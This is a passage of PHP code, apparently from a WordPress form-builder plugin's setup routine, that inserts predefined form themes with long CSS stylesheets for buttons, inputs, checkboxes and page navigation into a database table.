#F3CC92 39%, #F5CB8F 100%); /* W3C */\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 18px;\r\n	line-height: 20px;\r\n	background-color: #EBEAEA;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: center!important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_page_navigation:after {\r\n	content: " ";\r\n	display: block;\r\n	height: 9px;\r\n	background: url([SITE_ROOT]/images/07/0.png) no-repeat;\r\n	position: relative;\r\n	background-size: cover;\r\n	top: -9px;\r\n}\r\n.wdform_percentage_text {\r\n	margin-right:9px;\r\n	color: #FFFFFF;\r\n	font-weight: normal;\r\n	font-size: 13px;\r\n	position: relative;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n\', 0)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`id`, `title`, `css`, `default`) VALUES(28, \'Theme 08 transparent (black button)\', \'.radio-div input[type="radio"],\r\n.checkbox-div input[type="checkbox"]\r\n{\r\nvisibility: hidden;\r\n}\r\n.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #000000;\r\nmargin-bottom: 10px;\r\ncolor: #000000;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\nwidth: 13px;\r\nheight: 13px;\r\ntop: -4px;\r\nborder: 0px;\r\nborder-radius: 13px;\r\nbackground: #FAFAFA;\r\nborder: 3px solid #B1B1B1;\r\noutline: none;\r\n}\r\na.ui-spinner-button\r\n{\r\nbackground:none !important;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F5F5F5 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #414141;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\n\r\n\r\n.ui-slider-range {\r\n	background: #8A8A8A !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 1px solid #EEEEEE !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F8F8F8;\r\n	border: 0px solid #D3D3D3;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/08/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text] {\r\n	margin: 0px;\r\n}\r\ninput[type=password] {\r\n	margin: 0px;\r\n}\r\ninput[type=url] {\r\n	margin: 0px;\r\n}\r\ninput[type=email] {\r\n	margin: 0px;\r\n}\r\ninput.text {\r\n	margin: 0px;\r\n}\r\ninput.title {\r\n	margin: 0px;\r\n}\r\ntextarea {\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 71px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/07/upload.png);\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background: url([SITE_ROOT]/images/08/next.png) no-repeat right;\r\n	padding: 0px 36px 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n        border: 1px solid #CECECE;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: url([SITE_ROOT]/images/08/previous.png) no-repeat left;\r\n	padding: 0 20px 0 36px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border: 1px solid #CECECE;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #000;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n		border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: transparent;\r\n	padding: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #000000;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n.wdform_section_break \r\n{\r\n	color: #000000;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nbackground: #F8F8F8;\r\nborder: 0px solid #fff;\r\ncolor: #414141;\r\n	outline: none;\r\n}\r\n\r\ninput[type="text"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F0F0F0;\r\nborder:0px solid #fff;\r\ncolor: #414141;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F0F0F0;\r\nborder:0px solid #fff;\r\ncolor: #414141;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F0F0F0;\r\nborder:0px solid #fff;\r\ncolor: #414141;\r\n}\r\ninput[type="text"]:focus {\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus {\r\n	outline: none;\r\n}\r\ntextarea:focus {\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #000;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\ncursor: pointer;\r\n-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\nfilter: alpha(opacity=0);\r\nopacity: 0;\r\ncontent: "";\r\nposition: absolute;\r\nwidth: 13px;\r\nheight: 9px;\r\nbackground: url([SITE_ROOT]/images/08/checkbox.png) no-repeat;\r\nborder-radius: 0px;\r\ntop: 1px;\r\nleft: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #000000;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #000000;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #8A8A8A;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\ncolor: #CDCDCD;\r\nbackground-color: #F8F8F8;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 27px;\r\ntext-align: center;\r\nvertical-align: bottom;\r\npadding: 5px 25px 0px 25px;\r\nfont-size: 18px;\r\nmargin-right:3px;\r\nmargin-bottom:3px;\r\nfont-weight: bold;\r\n}\r\n.page_active {\r\n	color: #000;\r\ncursor: pointer;\r\nbackground-color: #FFFFFF;\r\ndisplay: inline-block;\r\nvertical-align: bottom;\r\nheight: 29px;\r\ntext-align: center;\r\nfont-size: 22px;\r\npadding: 5px 25px 0px 25px;\r\nborder: 1px solid #EEEEEE;\r\nfont-weight: bold;\r\nmargin-right:3px;\r\nborder-bottom: none;\r\nline-height: 26px;\r\n}\r\n.page_percentage_active {\r\npadding: 0px;\r\nmargin: 1px;\r\nborder-spacing: 0px;\r\nheight: 21px;\r\nline-height: 20px;\r\nfont-size: 15px;\r\nfloat: left;\r\ntext-align: right !important;\r\nz-index: 1;\r\nposition: relative;\r\nbackground: #000;\r\n}\r\n.page_percentage_deactive {\r\n	height: 24px;\r\nline-height: 20px;\r\nbackground-color: #FFFFFF;\r\ntext-align: left !important;\r\nmargin: 0 5px;\r\nborder: 1px solid #EEEEEE;\r\ndisplay: inline-block;\r\nwidth: 98%;\r\nborder-bottom: none;\r\n\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: -1px;\r\n}\r\n\r\n.wdform_percentage_text {\r\n	color: #FFF;\r\n	font-weight: bold;\r\n	font-size: 13px;\r\n	position: relative;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\', 0)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`id`, `title`, `css`, `default`) VALUES(29, \'Theme 08 deep pink\', \'.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #930049;\r\nmargin-bottom: 10px;\r\ncolor: #930049;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\nwidth: 13px;\r\nheight: 13px;\r\ntop: -4px;\r\nborder: 0px;\r\nborder-radius: 13px;\r\nbackground: #FAFAFA;\r\nborder: 3px solid #B1B1B1;\r\noutline: none;\r\n}\r\na.ui-spinner-button\r\n{\r\nbackground:none !important;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F5F5F5 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #414141;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\n\r\n\r\n.ui-slider-range {\r\n	background: #930049 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 1px solid #EEEEEE !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F8F8F8;\r\n	border: 0px solid #D3D3D3;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/08/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text] {\r\n	margin: 0px;\r\n}\r\ninput[type=password] {\r\n	margin: 0px;\r\n}\r\ninput[type=url] {\r\n	margin: 0px;\r\n}\r\ninput[type=email] {\r\n	margin: 0px;\r\n}\r\ninput.text {\r\n	margin: 0px;\r\n}\r\ninput.title {\r\n	margin: 0px;\r\n}\r\ntextarea {\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 71px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/07/upload.png);\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background: url([SITE_ROOT]/images/08/next.png) no-repeat right;\r\n	padding: 0px 36px 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n        border: 1px solid #CECECE;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: url([SITE_ROOT]/images/08/previous.png) no-repeat left;\r\n	padding: 0 20px 0 36px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border: 1px solid #CECECE;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #930049;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n		border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: #EEEEEE;\r\n	padding: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #930049;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n.wdform_section_break \r\n{\r\n	color: #930049;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nbackground: #F8F8F8;\r\nborder: 0px solid #fff;\r\ncolor: #414141;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:0px solid #fff;\r\ncolor: #414141;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:0px solid #fff;\r\ncolor: #414141;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:0px solid #fff;\r\ncolor: #414141;\r\n}\r\ninput[type="text"]:focus {\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus {\r\n	outline: none;\r\n}\r\ntextarea:focus {\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #636363;\r\n	border-radius: 0px;\r\n	position: 